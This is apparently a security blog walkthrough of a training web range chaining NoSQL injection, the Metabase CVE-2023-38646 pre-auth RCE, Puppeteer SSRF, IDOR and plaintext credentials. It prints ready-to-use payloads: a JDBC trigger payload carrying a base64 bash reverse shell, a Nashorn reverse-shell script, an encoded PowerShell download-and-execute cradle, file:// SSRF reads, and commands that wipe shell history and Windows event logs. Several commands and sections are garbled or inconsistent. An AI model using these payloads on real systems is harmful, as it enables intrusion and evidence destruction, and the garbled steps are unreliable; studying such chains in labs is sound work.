Listen to this Post
Introduction
Modern web applications rarely fall to a single, isolated bug. Real‑world compromise almost always involves chaining seemingly minor flaws – an authentication bypass that leaks credentials, a configuration weakness that permits remote code execution, and an internal pivot that exposes sensitive data. This article breaks down a beginner‑to‑intermediate realistic web range that chains six flags across a multi‑tenant property platform, covering NoSQL injection (NoSQLi), Metabase pre‑auth RCE (CVE‑2023‑38646), plaintext credential exposure, SSRF through a Puppeteer PDF microservice, and IDOR on a tenant portal.
Learning Objectives
Exploit a NoSQL injection to bypass authentication and gain initial access.
Trigger Metabase CVE‑2023‑38646 – understand why a JDBC `CREATE TRIGGER` with Nashorn JavaScript gives you pre‑auth RCE, rather than just running a public exploit.
Perform server‑side request forgery (SSRF) via a PDF generation service to read local source code, identify a hidden internal API, and pivot through it.
You Should Know
- The Complete Exploitation Chain – From Public Facing Endpoint to Internal API
The range simulates a realistic multi‑tenant property platform. Each vulnerability feeds into the next, making the chain feel purposeful rather than arbitrary. Below is the walkthrough that mimics a real penetration test.
Step 1 – NoSQL Injection to Bypass Authentication
Many modern applications use MongoDB with dynamic query objects. The vulnerable login endpoint passes unsanitised user input directly into the query.
Vulnerable code example (Node.js + Mongoose):
app.post(‘/login’, (req, res) => {
const user = db.users.findOne({
email: req.body.email,
password: req.body.password
});
// …
});
An attacker can inject MongoDB operators:
{
“email”: { “$ne”: null },
“password”: { “$ne”: null }
}
This returns the first user in the collection – effectively bypassing the password check. Many public APIs also allow parameter pollution: `“email[$ne]=”` or `“password[$regex]=.”` to achieve the same result.
Step 2 – Pre‑Auth Remote Code Execution via Metabase (CVE‑2023‑38646)
After gaining a low‑privileged foothold, you discover that an internal instance of Metabase (a business intelligence tool) is exposed. Metabase versions before a certain patch are vulnerable to CVE‑2023‑38646 – a pre‑authentication RCE caused by improper JDBC connection string handling on the endpoint /api/setup/validate.
The vulnerability allows an attacker to craft a malicious H2 database connection URL that includes a `CREATE TRIGGER` statement with Nashorn JavaScript. The trigger executes arbitrary operating system commands when the JDBC connection is established.
Example exploitation steps:
- Set up a netcat listener on your attack machine:
nc -lvnp 4444
-
Send a POST request to `/api/setup/validate` with a payload similar to:
{ “details”: { “db”: “h2:mem:;MODE=MSSQL;TRACE_LEVEL_SYSTEM_OUT=1\;CREATE TRIGGER shellcmd BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec(‘bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC9Zb3VySVAvNDQ0NCAwPiYxJ30=}|{base64,-d}|{bash,-i}’)\n$$” }, “engine”: “h2” }(The base64‑encoded string is
bash -c ‘bash -i >& /dev/tcp/YourIP/4444 0>&1’.)
Understanding the `CREATE TRIGGER` with Nashorn JavaScript is the key – you are not simply running a public script; you are learning how JDBC drivers can be subverted.
Step 3 – Pivot Using SSRF via the PDF Microservice
After gaining a shell on the Metabase host, you enumerate the internal network and find a PDF generation service powered by Puppeteer. The service allows users to submit HTML that is converted to PDF, but it does not properly sanitise input, leading to server‑side request forgery (SSRF) and local file disclosure.
SSRF exploitation steps:
<img src=“file:///etc/passwd” />
When the headless browser renders this HTML, it requests `file:///etc/passwd` from the server’s own filesystem and embeds the result into the PDF. This reveals a hidden internal API endpoint that the gateway deliberately hides from external access.
Step 4 – Read Internal Source Code via file:// and Pivot
Using the SSRF primitive, read the source code of the internal API:
<img src=“file:///var/www/internal-api/index.js” />
Within the source code you discover a secret token and an endpoint that allows tenant data manipulation without any ownership verification – a classic Insecure Direct Object Reference (IDOR).
Step 5 – IDOR on the Tenant Portal
The internal API uses numeric tenant IDs in the URL path or query string:
GET /api/tenants/12345/reports
By changing the ID to 12346, you access another tenant’s reports. Many multi‑tenant applications fail to enforce proper access controls at the API layer, trusting that the client will never modify identifiers.
Step 6 – Extract Plaintext Credentials from the Database
During earlier reconnaissance, you discovered a notes table in the application’s database that stores sensitive information in plaintext – including administrator credentials. Querying this table (via the SQL injection gained from the IDOR) provides the final flag.
Step 7 – Full Chain Cleanup and Persistence
After obtaining full control, always consider operational security. For Linux targets:
Remove uploaded tools and clear logs rm -rf /tmp/.exploit cat /dev/null > ~/.bash_history && history -c
For Windows targets:
Clear PowerShell history and remove artefacts Remove-Item (Get-PSReadlineOption).HistorySavePath Clear-EventLog -LogName Application, System, Security
- Troubleshooting Reverse Shells – Common Pitfalls and Fixes
During the range, reverse shell troubleshooting often teaches more than the flag submission itself. Here are the most frequent issues and their solutions.
Issue 1 – Wrong VPN IP
Always verify your attacker machine’s IP address inside the lab environment:
ip addr show tun0
If your VPN interface is tun0, ensure the payload uses that address, not your local network IP.
Issue 2 – Trigger Name Collisions in JDBC
When exploiting CVE‑2023‑38646, you must use a unique trigger name. If the name already exists in the H2 database, the `CREATE TRIGGER` fails silently.
Fix: Use randomised names:
TRIGGER_NAME=$(cat /dev/urandom | tr -dc ‘a-zA-Z0-9’ | fold -w 8 | head -1 1)
Then embed `${TRIGGER_NAME}` in the JSON payload.
Issue 3 – Nashorn JavaScript Execution Quirks
The Nashorn engine (used in Java 8 to 14) has subtle differences compared to a normal Bash shell. For example:
Use `java.lang.Runtime.getRuntime().exec(‘command’)` rather than `exec(‘command’)`.
Command arguments must be passed as an array: .exec(new String[]{“bash”, “-c”, “echo test”}).
Environment variables are not inherited by default.
A reliable payload that writes a reverse shell script and executes it:
java.lang.Runtime.getRuntime().exec(new String[]{“bash”, “-c”, “echo -e ‘!/bin/bash\nbash -i >& /dev/tcp/10.10.10.10/4444 0>&1’ > /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh”});
Issue 4 – PowerShell Reverse Shell Not Working on Windows
If the target is Windows, use a base64‑encoded PowerShell one‑liner to avoid quotation mark issues:
powershell -1oP -1onI -W Hidden -Exec Bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAwAC4AMQAwADoAOAAwADgAMAAvAHIAZQB2AGUAcgBzAGUALgBwAHMAMQAnACkA
Decode the string to see the original command:
IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.10.10:8080/reverse.ps1’).
Issue 5 – Interactive Shell Stabilisation
A basic netcat reverse shell is often unstable. Upgrade it to a fully interactive TTY:
On target (after catching the shell) python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ On attacker machine (after catching the shell) stty raw -echo; fg
What Undercode Say
Multi‑vector chaining is the new standard – isolated vulnerabilities are increasingly rare, and realistic ranges that force learners to pivot from NoSQLi to SSRF to IDOR are essential for modern security training.
Understanding why a vulnerability works, not just how to exploit it, separates script kiddies from analysts. The Metabase JDBC trigger with Nashorn is a perfect example of a flaw that requires reading the actual vulnerability write‑up, not just running a PoC.
The gap between “entry‑level” and “intermediate” is precisely this friction – when a simple VPN misconfiguration or a trigger name collision breaks your exploit, you are forced to understand the underlying mechanics. Ranges that intentionally introduce this friction are far more valuable than those where every flag falls after a single predictable command.
Prediction
-1 Expect an increase in “hardened” multi‑tenant applications that still expose legacy API endpoints, especially PDF generation services. Puppeteer SSRF will become a top‑five cloud vulnerability by 2027 as more organisations adopt headless browser automation without proper network sandboxing.
+1 Open‑source exploit chaining frameworks will emerge, integrating scanners for NoSQLi, JDBC RCE, and SSRF into a single pipeline. This will lower the barrier for blue teams to reproduce complex attack chains, leading to better defensive automation.
-1 The move to serverless and microservice architectures will exacerbate IDOR risks, because developers often assume that function‑level permissions are enough and neglect object‑level checks across different services.
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Shaheer Yasir – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
